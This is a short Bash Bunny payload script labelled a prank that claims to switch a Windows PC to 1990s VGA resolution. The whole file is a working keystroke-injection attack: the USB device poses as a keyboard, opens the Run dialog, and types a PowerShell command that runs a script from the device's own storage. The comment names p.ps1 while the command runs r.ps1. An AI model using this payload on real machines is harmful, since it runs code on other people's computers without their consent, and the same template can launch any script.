#!/bin/bash
#
# Title:         90s Mode
# Author:        Hak5Darren
# Version:       1.0
# Category:      Prank
# Target:        Windows XP SP3+
# 
# Turns back the clock to a k-rad ultra ereet 1990's VGA resolution
# Executes p.ps1 from the selected switch folder of the Bash Bunny USB Disk partition,

# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh

LED R B
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\r.ps1')"
QUACK ENTER
LED G